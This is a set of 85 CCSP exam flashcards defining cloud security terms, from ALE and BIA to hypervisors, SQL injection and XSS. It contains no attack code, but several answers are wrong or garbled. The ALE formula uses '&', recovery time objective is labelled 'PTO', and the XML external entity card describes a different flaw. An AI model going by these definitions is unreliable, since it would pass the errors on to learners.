CCSP - All in one deck

Question 1

Annualized loss expectancy (ALE)

Answer 1

The value derived by multiplying the single loss expectancy (SLE) by annualized rate of occurrence (ARO).

ALE = SLE & ARO

Question 2

Annualized rate of occurrence

Answer 2

An estimated number of the times a threat will successfully exploit a given vulnerability over the course of a single year.

Question 3

business continuity management

Answer 3

a process that is designed to identify risk, threats, and vulnerabilities, that could disrupt or impact services, with the intent on determining mitigating strategies and response process should they occur.

Question 4

business impact analysis (BIA)

Answer 4

A structured methodology to identify and evaluate the possible risk and threats that operations or services could be impacted by

Question 5

cloud application

Answer 5

An application that is never installed on a local server or desktop

Question 6

Cloud Application Management for Platforms (CAMP)

Answer 6

Within a PaaS implementation CAMP serves as the frameworks and specification for managing services; the model for describing and documenting the components that comprise the platform; and the language for describing the overall platform and its components and services, as well as metadata about it.

Question 7

cloud backup

Answer 7

the process of using a cloud-based back-up system with files and data being sent over the network to a public or private cloud provider for back-up.

Question 8

cloud back-up service provider

Answer 8

A public or private cloud services organization that offers backup services to either the public or organization clients either on a free basis or using various costing models based on data or systems.

Question 9

cloud back-up solutions

Answer 9

services that run within a public or private cloud offering backup solutions, either through client-based software that does automatic or scheduled backups or through manual backups initiated by a user system.

Question 10

cloud computing

Answer 10

a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computer resources that can be rapidly provisioned and released with minimal management effort or service provider interaction.

Question 11

Cloud computing reseller

Answer 11

An organization that sells and offers cloud services and possible cloud support services to various organizations and works as middleman between the cloud customer and cloud provider.

Question 12

Cloud Controls Matrix

Answer 12

A formally published guide by the Cloud Security Alliance that enables cloud customers to evaluate a prospective cloud provider in regard to its security posture. The CCM allows cloud providers to structure its security approach.

Question 13

Cloud data portability

Answer 13

The ability to move data between cloud providers

Question 14

Cloud database

Answer 14

a database that is installed in a cloud environment and accessed via the network to the Internet by a user or application. Because the database is being installed in a cloud environment elasticity, scalability and high availability can be achieved and maximized.

Question 15

cloud enablement

Answer 15

The creation of a public cloud environment through the offering of services or infrastructure.

Question 16

cloud management

Answer 16

the oversight and operations management of a cloud environment by the cloud service provider whether it is a public or private cloud environment.

Question 17

cloud migration

Answer 17

the process of moving services, systems, applications, on dat from a traditionaldata center hosting model into a cloud environment.

Question 18

Cloud OS

Answer 18

An operating system in a PaaS implementation and signify the implementation within a cloud environment.

Question 19

Cloud provider

Answer 19

A service provider that makes makes storage or software applications available via the internet or provide networks to customers.

Question 20

Cloud provisioning

Answer 20

the process of allocating cloud resources from the cloud provider to the cloud customers based on specific requests and requirements of the customer as far as the number of virtual machines and their specific computing resources.

Question 21

Cloud Security Alliance

Answer 21

The most prominent and well-known organization to raise awareness of best practices for security within a cloud environment.

Question 22

Cloud server hosting

Answer 22

The hosting and location of servers within a virtualized cloud environment, rather than the virtual or physical hosting that’s done in a traditional data center.

Question 23

Cloud service broker

Answer 23

a partner that servers as an intermediary between a cloud service customer and a cloud service provider

Question 24

Cloud testing

Answer 24

The testing of systems, services, or applications by leveraging cloud platforms and resources to simulate the size and scale of real-world traffic and users.

Question 25

Common Criteria

Answer 25

set of international security standards based on ISO/IEC 15408

Question 26

Community Cloud

Answer 26

A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns. It may be owned, managed , and operated by one or more of the organizations in the community or some combination of these and it may exist off premises.

Question 27

Container

Answer 27

A software packaged that contains all the code, configurations, and libraries needed for an application to operate, packaged inside a single unit.

Question 28

Cross-site scripting (XSS)

Answer 28

Security vulnerability found with web applications where an attacker can inject client-side scripts into web pages that are then viewed and executed by other users. The goal of XSS from an attacker’s perspective is to bypass the security controls of an application such as an access control with a same origin policy.

Question 29

Data at rest (DAR)

Answer 29

Data that resides on a system in a persistent storage

Question 30

Data dispersion

Answer 30

cloud storage where data is spread across data centers or wide geographic areas for redundancy and speed. The degree of dispersion is typically based on the needs of the application and the level of service procured by the cloud customer.

Question 31

data in transit

Answer 31

data that flows over a networked connection either through public unsecured networks or internal protected corporate networks

Question 32

data in use

Answer 32

data within a system or application that is currently being processed or in use. Either by the application or in memory.

Question 33

direct identifers

Answer 33

information that specifically applies to a unique individual (name, address, email, etc.)

Question 34

Distributed resource scheduler

Answer 34

a utility from VMware that balances computing demands and available resources within the virtualized environment

Question 35

Dynamic application security testing (DAST)

Answer 35

testing of an application while it is in an operational state with currently running systems, applications, and networks

Question 36

dynamic optimization

Answer 36

The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization.

Question 37

Eucalyptus

Answer 37

Free and open source software for utilizing Aws to build public and private cloud offerings. Elastic Utility Computer architecture for linking your programs to useful systems

Question 38

Federal Rules of civil procedures

Answer 38

set of rules and procedures that govern civil legal proceedings in the US federal courts to provide uniformity and efficiency in resolving legal matters and proceedings.

Question 39

Federal rules of evidence

Answer 39

Set of rules that apply to US federal courts for collecting evidence in a uniform and official manner.

Question 40

FIPS 140-2

Answer 40

Security standard published by the US federal government that pertains to the accreditations of cryptographic modules.

Question 41

Hashing

Answer 41

taking data of arbitrary type, length, or size and using a mathematic function to map the data to a value that is of a fixed size. Hashing can be applied to virtually any type of data object.

Question 42

Host Intrusion Detection System (HIDS)

Answer 42

host-based intrusion detection system that monitors the internal resources of a system for malicious attempts.

Question 43

Hypervisor

Answer 43

virtual machine manager that allows and enables multiple virtual hosts to reside on the same physical host.

Question 44

Identity Provider (IdP)

Answer 44

A system responsible for determining the authenticity of a user or system providing assurance to a service that the identity is valid and known and possibly providing additional information about the identity of the user system to the service provider requesting it.

Question 45

IDS

Answer 45

device, appliance, or software that monitors servers systems or networks for malicious activities.

Question 46

Information rights management (IRM)

Answer 46

a subset of digital rights management that is focused on protecting sensitive information from unauthorized exposure or use.

Question 47

Intrusion prevention system

Answer 47

network-based appliance or software that examines network traffic for know exploits or attempts to use exploits and actively stops them or blocks attempts.

Question 48

Mean time between failures

Answer 48

a measure, of what the average time between failures is for hardware component to determine its reliability.

Question 49

measured service

Answer 49

Cloud services that are delivered and billed for in a metered way.

Question 50

mobile cloud storage

Answer 50

cloud based storage that enables the user to access their data from any network location and across multiple devices.

Question 51

mobile device management (MDM)

Answer 51

term for a suite of policies, technologies, and infrastructure that enables an organization to mange and secure mobile devices that are granted access to its data cross a homogenous environment.

Software typically installed on mobile devices that allow for security configurations and policies to be enabled.

Question 52

mulittenancy

Answer 52

having multiple customers and applications running within the same environment but in a way that they are isolated from each other and not visible to each other while still sharing the same resources.

Question 53

network security group

Answer 53

set of rules that can be applied to network resources for processing and handling of network traffic.

Rules include: filter traffic based on direction of traffic flow, source address, destination address, ports of both source and destination and the protocols being used.

Question 54

Network intrusion detection system

Answer 54

network-based device placed at strategic places on a network to monitor and analyze all network traffic traversing the subnet and comparing it against signatures for known vulnerabilities and attacks.

Question 55

NIST 800-53

Answer 55

Security and Privacy Controls for Federal Information Systems and Organizations - security controls for all systems under US federal government

Question 56

nonrepudiation

Answer 56

the ability to confirm the origin or authenticity of data to a high degree of certainty.

Question 57

object storage

Answer 57

storage method used with IaaS where data elements are managed as objects rather than in hierarchical storage with a file system and directory structure

Question 58

Open Group Architecture Framework

Answer 58

An open enterprise architecture model that is intended to be a high-level approach that design teams can use to optimize success, efficiency, and returns throughout a system life cycle.

Question 59

Operational level agreement (OLA)

Answer 59

AN official ITIL term that relates to a specialized service level agreement 9SLA) pertaining to internal parties of an organization.

Question 60

Privacy level agreement

Answer 60

Declaration published by the cloud service provider documenting its approach to data privacy. The PLA is implemented by the cloud service provider.

Question 61

Recovery point objective (RPO)

Answer 61

duration of time in the past that an organization is willing to revert to in order to restore lost data or services following an interruption

Question 62

recovery time objective (PTO)

Answer 62

defined maximum time duration for which an organization can accept the loss of data or services following an interruption.

Question 63

relying party

Answer 63

a system or application that provides access to secure data through the use of an identity provider.

Question 64

Representational State Transfer (REST)

Answer 64

A system for designing and implementing network applications by utilizing a stateless, cacheable, client-server protocol via HTTP

Question 65

Resource pooling

Answer 65

Aggregation and allocation of resources from the cloud provider to serve the cloud customers

Question 66

Reversibility

Answer 66

Ability of a cloud customer to recover all data and applications from a cloud provider and completely remove all data from the cloud provider’s enviroment.

Question 67

Runtime application self-protection (RASP)

Answer 67

Security technology and systems integrated into a system or application that enables it to detect and prevent attacks in real-time.

Question 68

Sandboxing

Answer 68

segregation and isolation of information or processes from others within the same system or application, typically for security concerns.

Question 69

Sherwood applied business security architecture (SABSA)

Answer 69

proven methodology for developing business-driven, risk and opportunity-focused security architectures at both enterprise and solution levels that traceably support business objectives.

Widely used for information assurance architectures and risk management frameworks as well as to align and seamlessly integrate security and risk management into IT architecture methods and frameworks. SABSA is composed of a series of integrated frameworks, models, methods, and process and can be independently or as a holistic integrated enterprise solution.

Question 70

Simple object access protocol (SOAP)

Answer 70

messaging protocol that is operating system agnostic and used to communicate with other systems through HTTP and XML.

Question 71

Single Loss Expentancy

Answer 71

The monetary value assigned to the occurrence of a single instance of risk or exploit to an IT service, application or system.

Question 72

Service Oriented Architecture (SOA)

Answer 72

a system of providing IT applications and data service to other components through communication protocols over a network independent of any particular technology, system, provider, or implementation.

Question 73

Software Defined Networking (SDN)

Answer 73

approach to separate the network configurations for the control plane and the data plane. This allows an abstraction for network administrators to configure and control those aspects of the network important to modern systems and applications without having to get involved with the actual mechanisms for forwarding network traffic.

Question 74

SQL injection

Answer 74

a method used by malicious actors to insert SQL statements into a dat-driven application in various input fields attempting to get the application to access arbitrary code and return the results to the attacker.

This could include attempts to access a full database or protect data within it or to modify or delete data.

Question 75

static application security testing (SAST)

Answer 75

Security testing of applications by analysis of source code , binaries, and configurations. This is done by testers who have in-depth knowledge of systems and applications and is performed in a non-running state environment.

Question 76

Tokenization

Answer 76

process of replacing and substituting secure or sensitive data in a data set with an abstract or opaque value that has no use outside of the application.

Question 77

Trust zones

Answer 77

a security concept of separating systems and data into different levels or zones and applying security methods and practices to each zone based on the requirements of that particular group of systems.

Question 78

underpinning contract (UC)

Answer 78

a contract negotiated and agreed upon between an organization and an external service provider or vendor.

Question 79

vertical cloud computing

Answer 79

the optimization of cloud computing resources for a particular stack or vertical such as a specific type of application or system or by a particular industry or sector need.

Question 80

virtual host or virtual machine

Answer 80

computing environment that is a software implementation running on a host system versus a physical hardware environment.

Question 81

VM based rootkit (VMBR)

Answer 81

type of root kit hat is installed in a virtualized environment between the underlying host system and the virtual machine. it is then executed and used when the virtual machine is started. a VM based root kit is very difficult to detect in an environment but also very difficult to successfully implement.

Question 82

Volume storage

Answer 82

a more typical or standard file system used with Iaas that provides a virtual partition or hard disk to a virtual machine and can be used as a traditional drive would be.

Question 83

web application firewall (WAF)

Answer 83

An appliance or software plugin that parses and filters HTTP traffic from a bowser or client and applies a set of rules before the traffic is allowed to proceed to the actual application server.

Question 84

XML apliance

Answer 84

An appliance that is implemented within a network to secure and manage XML traffic. TI is particularly used within a cloud environment to help integrate cloud-based systems with those still residing in traditional data centers.

Question 85

XML external entity

Answer 85

occurs when a developer has in their code a reference to data on the application side, such as a database key, the directory structure of the application, configuration information about the hosting system or any other formation that pertains to the workings of the application that should not be exposed to users or the network.